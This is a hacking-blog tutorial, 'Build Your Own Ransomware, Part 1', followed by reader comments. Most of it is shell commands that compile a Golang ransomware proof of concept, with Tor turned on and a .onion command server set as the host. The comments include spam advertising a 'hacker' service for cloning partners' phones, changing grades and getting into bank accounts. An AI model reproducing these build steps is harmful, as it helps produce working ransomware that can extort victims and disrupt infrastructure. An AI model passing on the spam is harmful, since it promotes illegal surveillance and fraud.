top of page
  • Writer's pictureotw

Ransomware: Build Your Own Ransomware, Part 1

Welcome back, my aspiring cyberwarriors!

Ransomware is rapidly becoming the most important form of malware afflicting our digital systems. Companies across the globe are being hit with various forms of malware including the new variant, Snake, designed specifically for SCADA/ICS systems. The Colonial Pipeline in the US was shutdown for nearly a week before paying a $5 million ransom, demonstrating the danger of this ransomware to industrial systems and a nation's infrastructure. Recently, the major US insurance company, CNA, admitted to having paid a ransom of $40 million! No wonder ransomware developers are getting more and more creative and malicious, ransomware pays!

To better understand how ransomware works, let's build our own ransomware from a Proof of Concept (POC) available from mauri870 on He developed this ransomware as part of his academic program and it is not designed for malicious purposes but rather to help us understand how ransomware works. Like the new variant, Snake, and a growing number of malware strains, this malware is written in Golang.

This malware encrypts the files in the background with AES-256-CTR and uses RSA-4096 to secure the data exchange with the server. This ransomware is very similar to Cryptolocker, one of the most successful ransomware attacks in history.

Step #1: Download and Install the Binaries

The first step is to fire up your Kali and make certain that golang is installed. If not, download it from the Kali repositories by entering;

kali > sudo apt install golang

Next, you will need to login to the root user.

kali > sudo su -

Now create a directory for the binaries. In this case, I named it simply "git".

kali >mkdir git

Next, change directory (cd) to this directory.

kali > cd git

Next, download the binaries from

kali > git clone

Step #2: Export GO Environment variables

Next, we need to set some environment variables to direct the binaries and GO to the appropriate directories.

Step #3: Make the source code dependencies

Now, with the variables set and exported, we need to make the dependencies. Navigate to the new directory, ransomware, and enter make deps.

kali > cd ransomware

kali > make deps

Step #4: Make the Source Code with options

Now that we have completed the deps make, we can begin to make the source code. In our case, we will use a few options.

First, we want to use ToR to encrypt our communications over the ToR network.


Second, we want to use our dark web server at hackersarisegtdj.onion (you can use any domain or localhost).


Third, we want to use port 80 (you can use any port).


Finally, we want to set the operating system to compile the source code for our operating system, in this case, Linux.


Our command should look something like this;

kali > make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linux

Now hit ENTER and watch your ransomware compile.

Step #5: Check the Directory for ransomware.exe

Once the source code has been generated, do a long listing on the ransomware directory.

kali > ls -l

Now, navigate to the bin directory.

kali > cd bin

Here, you will see the ransomware.exe, the server and unlocker.exe.

Step #6: Examine the Types of Files to be Encrypted

If you want to see what types of files this ransomware will encrypt, navigate to cmd directory and open common.go

kali > cd cmd

kali > more common.go

Here, you can see the file extensions that this ransomware will target to encrypt when executed.


Ransomware is probably the greatest threat to our digital systems at this moment. As the Colonial Pipeline attack clearly demonstrated, nearly everyone is vulnerable and if SCADA/ICS systems are compromised there can be significant economic and infrastructure ramifications!

This POC of ransomware will help you to better understand ransomware as a threat and test to see whether your systems are vulnerable to such an attack.

In the second part of this series, we will test this ransomware on a Windows VM.

If you want or your team to learn more about ransomware, our Ransomware training videos are available in our online store.

Recent Posts

See All


Jan 03, 2023

Do you suspect your spouse of cheating, are you being overly paranoid or seeing signs of infidelity…Then he sure is cheating: I was in that exact same position when I met Henry through my best friend James who helped me hack into my boyfriend’s phone, it was like a miracle when he helped me clone my boyfriend’s phone and I got first-hand information from his phone. Now I get all his incoming and outgoing text messages, emails, call logs, web browsing history, photos and videos, instant messengers(facebook, whatsapp, bbm, IG etc) , GPS locations, phone taps to get live transmissions on all phone conversations. if you need help contact his gmail on ,, and you can also , whatsap…


Hey everyone , I don’t really know much about this hacking things but I can direct you to a professional hacking company who helped me to track and hack my boyfriend’s iPhone and his Facebook respectively.. If you need to check on your partner’s sincerity, employee’s honesty, recover your email passwords, Social networks (i.e Facebook, Twitter, IG), change your school grades, clear your criminal records, gain access to bank accounts,spy on phone. you can just contact them at … Their charges are minimal and negotiable contact them at Henryclarkethicalhacker @ gmail, com]..tell him you are from me or text him or whatsapp +1 8 1 3 4 2 1 1 3 2 6…. You can thank me later.


thanks very much sir this will help me in my college project for sure i was finding content like this can you write how to safely run it on window and make it normal without any damage pls sir

bottom of page